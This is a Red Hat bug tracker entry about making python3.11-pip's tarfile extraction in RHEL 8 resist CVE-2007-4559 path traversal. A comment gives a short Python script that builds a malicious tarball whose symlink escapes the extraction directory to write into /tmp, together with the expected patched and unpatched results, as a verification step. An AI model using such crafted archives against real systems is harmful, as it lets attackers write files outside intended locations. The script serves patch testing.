Bug 2218249 - [RHEL8]python3.11-pip: Python tarfile extraction needs change to avoid a warning (CVE-2007-4559 mitigation)
Summary: [RHEL8]python3.11-pip: Python tarfile extraction needs change to avoid a warn...
Keywords:
Status: VERIFIED
Alias: None
Product: Red Hat Enterprise Linux 8
Classification: Red Hat
Component: python3.11-pip
Version: 8.9
Hardware: Unspecified
OS: Unspecified
unspecified
unspecified
Target Milestone: rc
: ---
Assignee: Charalampos Stratakis
QA Contact: Lukáš Zachar
URL:
Whiteboard:
Depends On: CVE-2007-4559
Blocks:
TreeView+ depends on / blocked
 
Reported: 2023-06-28 14:21 UTC by Charalampos Stratakis
Modified: 2023-08-16 09:49 UTC (History)
5 users (show)

Fixed In Version: python3.11-pip-22.3.1-4.el8
Doc Type: If docs needed, set a value
Doc Text:
Clone Of: 2218247
Environment:
Last Closed:
Type: Bug
Target Upstream Version:
Embargoed:


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Issue Tracker RHELPLAN-161105 0 None None None 2023-06-28 14:24:39 UTC

Comment 1 Charalampos Stratakis 2023-08-09 22:51:27 UTC
For verification:

Run this script to create a malformed tarball:

"""
import tarfile

def mkinfo(name, **kwargs):
    tarinfo = tarfile.TarInfo(name=name)
    for name, value in kwargs.items():
        setattr(tarinfo, name, value)
    return tarinfo

with tarfile.open('evil.tar.gz', 'w:gz') as tf:
    tf.addfile(mkinfo('./pyproject.toml'))
    tf.addfile(mkinfo('./tmp', type=tarfile.SYMTYPE,
                      linkname='../../../../../../../../tmp'))
    tf.addfile(mkinfo('./tmp/poc'))
"""

And then run python3.11 -m pip install evil.tar.gz

On an unpatched pip the evil.tar.gz will install successfully.

On a fixed/patched one a "tarfile.OutsideDestinationError: 'tmp/poc' would be extracted to '/tmp/poc', which is outside the destination" will appear.

Comment 3 Charalampos Stratakis 2023-08-09 22:52:29 UTC
The issue is fixed via the PR.


Note You need to log in before you can comment on or make changes to this bug.